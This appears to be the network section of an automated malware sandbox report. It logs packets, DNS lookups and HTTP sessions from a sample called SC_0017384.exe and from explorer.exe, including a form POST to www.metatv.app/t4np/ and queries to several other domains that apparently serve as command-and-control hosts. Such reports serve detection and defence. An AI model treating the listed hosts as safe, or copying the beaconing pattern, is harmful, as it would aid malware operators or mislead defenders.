                                                                            Mar 21, 2023 09:11:13.197953939 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.197958946 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.197978973 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198008060 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198015928 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.198075056 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198075056 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.198086977 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198127031 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198144913 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.198164940 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198184967 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.198193073 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198225975 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.198247910 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198266029 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198266029 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.198276043 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198303938 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.198337078 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.198349953 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198369980 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198404074 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.198411942 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198430061 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.198441029 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198472023 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198489904 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.198498011 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198527098 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.198542118 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198558092 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198585987 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.198592901 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198611975 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.198617935 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198645115 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198667049 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.198673010 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198703051 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.198812962 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198837996 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198873997 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.198883057 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198910952 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.198920012 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198964119 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.198971987 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.198980093 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199012995 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199037075 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199054956 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199085951 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199095964 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199124098 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199125051 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199124098 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199156046 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199177027 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199183941 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199204922 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199237108 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199256897 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199320078 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199320078 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199326038 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199337959 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199367046 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199377060 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199419975 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199426889 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199439049 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199470043 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199477911 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199502945 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199511051 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199528933 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199541092 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199547052 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199569941 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199596882 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199601889 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199614048 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199659109 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199657917 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199685097 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199692011 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199702024 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199722052 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199728966 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199767113 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199774027 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199790955 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199805021 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199814081 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199822903 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199850082 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199853897 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199882030 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199887991 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199913025 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199920893 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199942112 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199954987 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.199960947 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199987888 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.199992895 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.200021982 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.200028896 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.200094938 CET44349701188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:11:13.200138092 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.205179930 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:13.219450951 CET49701443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:11:27.447038889 CET4970280192.168.2.574.208.236.131
                                                                            Mar 21, 2023 09:11:27.573635101 CET804970274.208.236.131192.168.2.5
                                                                            Mar 21, 2023 09:11:27.573900938 CET4970280192.168.2.574.208.236.131
                                                                            Mar 21, 2023 09:11:27.575243950 CET4970280192.168.2.574.208.236.131
                                                                            Mar 21, 2023 09:11:27.701590061 CET804970274.208.236.131192.168.2.5
                                                                            Mar 21, 2023 09:11:27.708056927 CET804970274.208.236.131192.168.2.5
                                                                            Mar 21, 2023 09:11:27.708102942 CET804970274.208.236.131192.168.2.5
                                                                            Mar 21, 2023 09:11:27.708293915 CET4970280192.168.2.574.208.236.131
                                                                            Mar 21, 2023 09:11:27.708523989 CET4970280192.168.2.574.208.236.131
                                                                            Mar 21, 2023 09:11:27.834728003 CET804970274.208.236.131192.168.2.5
                                                                            Mar 21, 2023 09:11:38.866836071 CET4970380192.168.2.5217.160.0.229
                                                                            Mar 21, 2023 09:11:38.888350010 CET8049703217.160.0.229192.168.2.5
                                                                            Mar 21, 2023 09:11:38.888473034 CET4970380192.168.2.5217.160.0.229
                                                                            Mar 21, 2023 09:11:38.888617039 CET4970380192.168.2.5217.160.0.229
                                                                            Mar 21, 2023 09:11:38.910226107 CET8049703217.160.0.229192.168.2.5
                                                                            Mar 21, 2023 09:11:38.913914919 CET8049703217.160.0.229192.168.2.5
                                                                            Mar 21, 2023 09:11:38.913968086 CET8049703217.160.0.229192.168.2.5
                                                                            Mar 21, 2023 09:11:38.914086103 CET4970380192.168.2.5217.160.0.229
                                                                            Mar 21, 2023 09:11:40.611500025 CET4970380192.168.2.5217.160.0.229
                                                                            Mar 21, 2023 09:11:42.472388029 CET4970480192.168.2.5217.160.0.229
                                                                            Mar 21, 2023 09:11:42.493897915 CET8049704217.160.0.229192.168.2.5
                                                                            Mar 21, 2023 09:11:42.494080067 CET4970480192.168.2.5217.160.0.229
                                                                            Mar 21, 2023 09:11:42.533204079 CET4970480192.168.2.5217.160.0.229
                                                                            Mar 21, 2023 09:11:42.554815054 CET8049704217.160.0.229192.168.2.5
                                                                            Mar 21, 2023 09:11:42.559078932 CET8049704217.160.0.229192.168.2.5
                                                                            Mar 21, 2023 09:11:42.559123039 CET8049704217.160.0.229192.168.2.5
                                                                            Mar 21, 2023 09:11:42.559322119 CET4970480192.168.2.5217.160.0.229
                                                                            Mar 21, 2023 09:11:42.559458971 CET4970480192.168.2.5217.160.0.229
                                                                            Mar 21, 2023 09:11:42.580852032 CET8049704217.160.0.229192.168.2.5
                                                                            Mar 21, 2023 09:11:52.656604052 CET4970580192.168.2.554.85.86.211
                                                                            Mar 21, 2023 09:11:52.801187038 CET804970554.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:52.801294088 CET4970580192.168.2.554.85.86.211
                                                                            Mar 21, 2023 09:11:52.801453114 CET4970580192.168.2.554.85.86.211
                                                                            Mar 21, 2023 09:11:52.954804897 CET804970554.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:52.954843044 CET804970554.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:52.954863071 CET804970554.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:52.954883099 CET804970554.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:52.954902887 CET804970554.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:52.954948902 CET804970554.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:52.954958916 CET4970580192.168.2.554.85.86.211
                                                                            Mar 21, 2023 09:11:52.954969883 CET804970554.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:52.954998970 CET804970554.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:52.955053091 CET4970580192.168.2.554.85.86.211
                                                                            Mar 21, 2023 09:11:52.955158949 CET4970580192.168.2.554.85.86.211
                                                                            Mar 21, 2023 09:11:54.315562963 CET4970580192.168.2.554.85.86.211
                                                                            Mar 21, 2023 09:11:55.333163977 CET4970680192.168.2.554.85.86.211
                                                                            Mar 21, 2023 09:11:55.477792025 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.479923964 CET4970680192.168.2.554.85.86.211
                                                                            Mar 21, 2023 09:11:55.480048895 CET4970680192.168.2.554.85.86.211
                                                                            Mar 21, 2023 09:11:55.632705927 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.632738113 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.632761955 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.632783890 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.632818937 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.632841110 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.632848024 CET4970680192.168.2.554.85.86.211
                                                                            Mar 21, 2023 09:11:55.632863998 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.632886887 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.632909060 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.632917881 CET4970680192.168.2.554.85.86.211
                                                                            Mar 21, 2023 09:11:55.632917881 CET4970680192.168.2.554.85.86.211
                                                                            Mar 21, 2023 09:11:55.632930994 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.632955074 CET4970680192.168.2.554.85.86.211
                                                                            Mar 21, 2023 09:11:55.633019924 CET4970680192.168.2.554.85.86.211
                                                                            Mar 21, 2023 09:11:55.777327061 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.777365923 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.777394056 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.777420998 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.777448893 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.777468920 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.777487993 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.777487040 CET4970680192.168.2.554.85.86.211
                                                                            Mar 21, 2023 09:11:55.777513027 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.777539968 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.777565956 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.777570009 CET4970680192.168.2.554.85.86.211
                                                                            Mar 21, 2023 09:11:55.777570009 CET4970680192.168.2.554.85.86.211
                                                                            Mar 21, 2023 09:11:55.777592897 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.777618885 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.777641058 CET4970680192.168.2.554.85.86.211
                                                                            Mar 21, 2023 09:11:55.777646065 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.777668953 CET4970680192.168.2.554.85.86.211
                                                                            Mar 21, 2023 09:11:55.777673006 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.777698994 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.777710915 CET4970680192.168.2.554.85.86.211
                                                                            Mar 21, 2023 09:11:55.777724981 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:11:55.777847052 CET4970680192.168.2.554.85.86.211
                                                                            Mar 21, 2023 09:11:55.778002024 CET4970680192.168.2.554.85.86.211
                                                                            Mar 21, 2023 09:11:55.922086000 CET804970654.85.86.211192.168.2.5
                                                                            Mar 21, 2023 09:12:02.862020016 CET4970780192.168.2.5172.67.152.24
                                                                            Mar 21, 2023 09:12:02.879451036 CET8049707172.67.152.24192.168.2.5
                                                                            Mar 21, 2023 09:12:02.879631042 CET4970780192.168.2.5172.67.152.24
                                                                            Mar 21, 2023 09:12:02.879838943 CET4970780192.168.2.5172.67.152.24
                                                                            Mar 21, 2023 09:12:02.897113085 CET8049707172.67.152.24192.168.2.5
                                                                            Mar 21, 2023 09:12:03.137469053 CET8049707172.67.152.24192.168.2.5
                                                                            Mar 21, 2023 09:12:03.137500048 CET8049707172.67.152.24192.168.2.5
                                                                            Mar 21, 2023 09:12:03.137517929 CET8049707172.67.152.24192.168.2.5
                                                                            Mar 21, 2023 09:12:03.137578011 CET4970780192.168.2.5172.67.152.24
                                                                            Mar 21, 2023 09:12:03.137578011 CET4970780192.168.2.5172.67.152.24
                                                                            Mar 21, 2023 09:12:04.393651009 CET4970780192.168.2.5172.67.152.24
                                                                            Mar 21, 2023 09:12:05.416971922 CET4970880192.168.2.5172.67.152.24
                                                                            Mar 21, 2023 09:12:05.434499025 CET8049708172.67.152.24192.168.2.5
                                                                            Mar 21, 2023 09:12:05.435766935 CET4970880192.168.2.5172.67.152.24
                                                                            Mar 21, 2023 09:12:05.458389997 CET4970880192.168.2.5172.67.152.24
                                                                            Mar 21, 2023 09:12:05.475835085 CET8049708172.67.152.24192.168.2.5
                                                                            Mar 21, 2023 09:12:05.708584070 CET8049708172.67.152.24192.168.2.5
                                                                            Mar 21, 2023 09:12:05.708636999 CET8049708172.67.152.24192.168.2.5
                                                                            Mar 21, 2023 09:12:05.708668947 CET8049708172.67.152.24192.168.2.5
                                                                            Mar 21, 2023 09:12:05.708700895 CET8049708172.67.152.24192.168.2.5
                                                                            Mar 21, 2023 09:12:05.708882093 CET4970880192.168.2.5172.67.152.24
                                                                            Mar 21, 2023 09:12:05.708971977 CET4970880192.168.2.5172.67.152.24
                                                                            Mar 21, 2023 09:12:05.740622044 CET4970880192.168.2.5172.67.152.24
                                                                            Mar 21, 2023 09:12:05.757951021 CET8049708172.67.152.24192.168.2.5
                                                                            Mar 21, 2023 09:12:10.801623106 CET4970980192.168.2.5172.67.194.225
                                                                            Mar 21, 2023 09:12:10.819284916 CET8049709172.67.194.225192.168.2.5
                                                                            Mar 21, 2023 09:12:10.829819918 CET4970980192.168.2.5172.67.194.225
                                                                            Mar 21, 2023 09:12:10.836937904 CET4970980192.168.2.5172.67.194.225
                                                                            Mar 21, 2023 09:12:10.854644060 CET8049709172.67.194.225192.168.2.5
                                                                            Mar 21, 2023 09:12:10.917695045 CET8049709172.67.194.225192.168.2.5
                                                                            Mar 21, 2023 09:12:10.917721987 CET8049709172.67.194.225192.168.2.5
                                                                            Mar 21, 2023 09:12:10.917737961 CET8049709172.67.194.225192.168.2.5
                                                                            Mar 21, 2023 09:12:10.917756081 CET8049709172.67.194.225192.168.2.5
                                                                            Mar 21, 2023 09:12:10.932717085 CET4970980192.168.2.5172.67.194.225
                                                                            Mar 21, 2023 09:12:12.389298916 CET4970980192.168.2.5172.67.194.225
                                                                            Mar 21, 2023 09:12:13.392456055 CET4971080192.168.2.5172.67.194.225
                                                                            Mar 21, 2023 09:12:13.410079002 CET8049710172.67.194.225192.168.2.5
                                                                            Mar 21, 2023 09:12:13.410916090 CET4971080192.168.2.5172.67.194.225
                                                                            Mar 21, 2023 09:12:13.411086082 CET4971080192.168.2.5172.67.194.225
                                                                            Mar 21, 2023 09:12:13.428395033 CET8049710172.67.194.225192.168.2.5
                                                                            Mar 21, 2023 09:12:13.485526085 CET8049710172.67.194.225192.168.2.5
                                                                            Mar 21, 2023 09:12:13.485560894 CET8049710172.67.194.225192.168.2.5
                                                                            Mar 21, 2023 09:12:13.485586882 CET8049710172.67.194.225192.168.2.5
                                                                            Mar 21, 2023 09:12:13.488013029 CET4971080192.168.2.5172.67.194.225
                                                                            Mar 21, 2023 09:12:13.488013983 CET4971080192.168.2.5172.67.194.225
                                                                            Mar 21, 2023 09:12:13.505471945 CET8049710172.67.194.225192.168.2.5

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Mar 21, 2023 09:10:10.167546034 CET5029553192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:10:10.190110922 CET53502958.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:11:06.057960033 CET6189353192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:11:06.080689907 CET53618938.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:11:12.532519102 CET6064953192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:11:12.570863962 CET53606498.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:11:27.414058924 CET5144153192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:11:27.439889908 CET53514418.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:11:32.721693039 CET4917753192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:11:32.756217957 CET53491778.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:11:33.768779039 CET4972453192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:11:33.796116114 CET53497248.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:11:38.816267967 CET6145253192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:11:38.865930080 CET53614528.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:11:52.604053974 CET6532353192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:11:52.655042887 CET53653238.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:12:02.826678038 CET5148453192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:12:02.859888077 CET53514848.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:12:10.767373085 CET6344653192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:12:10.800434113 CET53634468.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:12:30.799199104 CET5675153192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:12:30.833955050 CET53567518.8.8.8192.168.2.5

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Mar 21, 2023 09:10:10.167546034 CET192.168.2.58.8.8.80x51aeStandard query (0)a.uguu.seA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:06.057960033 CET192.168.2.58.8.8.80x4cc7Standard query (0)a.uguu.seA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:12.532519102 CET192.168.2.58.8.8.80x4c7cStandard query (0)a.uguu.seA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:27.414058924 CET192.168.2.58.8.8.80x796eStandard query (0)www.findmyoriginstory.comA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:32.721693039 CET192.168.2.58.8.8.80xd6deStandard query (0)www.myprojoints.comA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:33.768779039 CET192.168.2.58.8.8.80x8005Standard query (0)www.myprojoints.comA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:38.816267967 CET192.168.2.58.8.8.80x9a6fStandard query (0)www.emprendizajesocial.comA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:52.604053974 CET192.168.2.58.8.8.80xae8bStandard query (0)www.brunaeleandro.comA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:12:02.826678038 CET192.168.2.58.8.8.80x2e15Standard query (0)www.madisoncountylincoln.comA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:12:10.767373085 CET192.168.2.58.8.8.80xf69Standard query (0)www.metatv.appA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:12:30.799199104 CET192.168.2.58.8.8.80x55cStandard query (0)www.funhood.lifeA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Mar 21, 2023 09:10:10.190110922 CET8.8.8.8192.168.2.50x51aeNo error (0)a.uguu.se188.40.83.211A (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:06.080689907 CET8.8.8.8192.168.2.50x4cc7No error (0)a.uguu.se188.40.83.211A (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:12.570863962 CET8.8.8.8192.168.2.50x4c7cNo error (0)a.uguu.se188.40.83.211A (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:27.439889908 CET8.8.8.8192.168.2.50x796eNo error (0)www.findmyoriginstory.com74.208.236.131A (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:32.756217957 CET8.8.8.8192.168.2.50xd6deName error (3)www.myprojoints.comnonenoneA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:33.796116114 CET8.8.8.8192.168.2.50x8005Name error (3)www.myprojoints.comnonenoneA (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:38.865930080 CET8.8.8.8192.168.2.50x9a6fNo error (0)www.emprendizajesocial.com217.160.0.229A (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:52.655042887 CET8.8.8.8192.168.2.50xae8bNo error (0)www.brunaeleandro.combrunaeleandro.comCNAME (Canonical name)IN (0x0001)false
                                                                            Mar 21, 2023 09:11:52.655042887 CET8.8.8.8192.168.2.50xae8bNo error (0)brunaeleandro.com54.85.86.211A (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:12:02.859888077 CET8.8.8.8192.168.2.50x2e15No error (0)www.madisoncountylincoln.com172.67.152.24A (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:12:02.859888077 CET8.8.8.8192.168.2.50x2e15No error (0)www.madisoncountylincoln.com104.21.65.231A (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:12:10.800434113 CET8.8.8.8192.168.2.50xf69No error (0)www.metatv.app172.67.194.225A (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:12:10.800434113 CET8.8.8.8192.168.2.50xf69No error (0)www.metatv.app104.21.20.242A (IP address)IN (0x0001)false
                                                                            Mar 21, 2023 09:12:30.833955050 CET8.8.8.8192.168.2.50x55cNo error (0)www.funhood.life162.213.249.254A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • a.uguu.se
                                                                            • www.findmyoriginstory.com
                                                                            • www.emprendizajesocial.com
                                                                            • www.brunaeleandro.com
                                                                            • www.madisoncountylincoln.com
                                                                            • www.metatv.app

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            0192.168.2.549698188.40.83.211443C:\Users\user\Desktop\SC_0017384.exe
                                                                            TimestampkBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            1192.168.2.549700188.40.83.211443C:\Users\user\Desktop\SC_0017384.exe
                                                                            TimestampkBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            10192.168.2.549709172.67.194.22580C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Mar 21, 2023 09:12:10.836937904 CET6181OUTPOST /t4np/ HTTP/1.1
                                                                            Host: www.metatv.app
                                                                            Connection: close
                                                                            Content-Length: 190
                                                                            Cache-Control: no-cache
                                                                            Origin: http://www.metatv.app
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://www.metatv.app/t4np/
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
